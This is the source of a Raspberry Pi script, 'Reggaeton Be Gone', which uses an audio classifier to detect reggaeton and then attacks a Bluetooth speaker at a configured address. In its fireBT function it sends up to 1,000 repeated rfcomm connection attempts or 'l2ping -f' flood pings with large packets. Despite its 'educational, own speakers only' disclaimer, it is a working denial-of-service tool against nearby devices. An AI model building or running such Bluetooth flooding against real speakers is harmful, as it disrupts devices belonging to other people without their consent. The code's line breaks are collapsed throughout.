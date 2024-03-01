1

# !/usr/bin/env python # -*- coding: utf- 8 -*- # Reggaeton Be Gone # Roni Bandini @RoniBandini https: //bandini.medium.com # February 2024 V 1.0 ( Sucio y Desprolijo, as Pappo said ) # MIT License ( c ) 2024 Roni Bandini # Disclaimer: this is an educational project. Use with your own BT speakers only. import os import subprocess import sys, getopt import signal import time import datetime from edge_impulse_linux.audio import AudioImpulseRunner from RPi import GPIO import Adafruit_GPIO.SPI as SPI import Adafruit_SSD1306 from PIL import Image from PIL import ImageDraw from PIL import ImageFont # Settings myPath= "/home/pi/reggaeton/" selectedDeviceId = 1 method = 1 # 1 to 3 targetAddr = ":::::" packagesSize = 800 threadsCount = 1000 threshold = 0.95 myDelay = 0.1 forceFire = 0 model = "reggaetonbgone-linux-armv7-v4.eim" runner = None # Push button GPIO.setwarnings ( False ) GPIO.setmode ( GPIO.BCM ) buttonPin = 26 GPIO.setup ( buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP ) # Oled screen RST = None DC = 23 SPI_PORT = 0 SPI_DEVICE = 0 disp = Adafruit_SSD1306.SSD1306_128_32 ( rst=RST ) disp.begin ( ) disp.clear ( ) disp.display ( ) font = ImageFont.truetype ( 'whitrabt .ttf ', 12) width = disp.width height = disp.height image = Image.new(' 1 ', (width, height)) draw = ImageDraw.Draw(image) draw.rectangle((0,0,width,height), outline=0, fill=0) padding = -2 top = padding bottom = height-padding x = 0 # Speaker logo image = Image.open(myPath+' images/logo.png ').convert(' 1 ') disp.image(image) disp.display() time.sleep(5) def writeLog(myLine): now = datetime.datetime.now() dtFormatted = now.strftime("%Y-%m-%d %H:%M:%S") with open(' log.txt ', ' a ') as f: myLine=str(dtFormatted)+","+myLine f.write(myLine+"

") def updateScreen(message1, message2): image = Image.new(' 1 ', (width, height)) draw = ImageDraw.Draw(image) draw.rectangle((0,0,width,height), outline=0, fill=0) padding = -2 x = 0 top = padding bottom = height-padding draw.text((x, top+4), "Reggaeton BeGone", font=font, fill=255) draw.text((x, top+16), message1, font=font, fill=255) draw.text((x, top+26), message2, font=font, fill=255) disp.image(image) disp.display() def fireBT(method, targetAddr, threadsCount, packagesSize, myDelay): writeLog("Firing with method #"+str(method)+ ", pkg "+ str(packagesSize) +' , target ' + targetAddr) if method==1: # Small, are you there? for i in range(0, threadsCount): print(' [ * ] ' + str(i + 1)) subprocess.call([' rfcomm ', ' connect ', targetAddr, ' 1 ']) time.sleep(myDelay) if method==2: # Medium, I think you should listen for i in range(0, threadsCount): print(' [ * ] ' + str(i + 1)) os.system(' l2ping -i hci0 -s ' + str(packagesSize) +' -f ' + targetAddr) time.sleep(myDelay) if method==3: # XXL, Say hello to my little friend for i in range(0, threadsCount): print(' [ * ] Sorry, Scarface method is not included in this version ' + str(i + 1)) time.sleep(myDelay) def signal_handler(sig, frame): print(' Interrupted ') writeLog("Interrupted") if (runner): runner.stop() sys.exit(0) signal.signal(signal.SIGINT, signal_handler) def main(argv): dir_path = os.path.dirname(os.path.realpath(__file__)) modelfile = os.path.join(dir_path, model) print("") print("Reggaeton Be Gone 1.0") print("@RoniBandini, February 2024") print("Sounds are quite innoxious, or most distressing, by their sort rather than their quantity - Jane Austen") print("Waiting for button...") print("") print("") writeLog("Started") # Display updateScreen(targetAddr, "Method #"+str(method)) time.sleep(3) # Olmedo, No toca botón while GPIO.input(buttonPin) == GPIO.HIGH: time.sleep(1) writeLog("Listening") updateScreen(targetAddr, "Listening...") print("Listening...") with AudioImpulseRunner(modelfile) as runner: try: model_info = runner.init() labels = model_info[' model_parameters '][' labels '] print(' Loaded AI-ML model "' + model_info['project']['owner'] + ' / ' + model_info['project']['name'] + '" ') writeLog("AI model "+model_info[' project '][' name ']) for res, audio in runner.classifier(device_id=selectedDeviceId): for label in labels: score = res[' result '][' classification '][label] if label==' reggaeton ' and score<=threshold: print(' %s: %.2f\t ' % (label, score)) updateScreen("Is reggaeton?", str(round(score*100,2))+" %") if label==' reggaeton ' and (score>threshold or forceFire==1): updateScreen("Firing speaker", "Score: "+ str(round(score*100,2))+" %" ) writeLog("Firing threshold: "+str(score)) time.sleep(4) image = Image.open(myPath+' images/logo.png ').convert(' 1 ') disp.image(image) disp.display() fireBT(method, targetAddr, threadsCount, packagesSize, myDelay) print(' ') finally: if (runner): runner.stop() if __name__ == ' __main__ ': main(sys.argv[1:])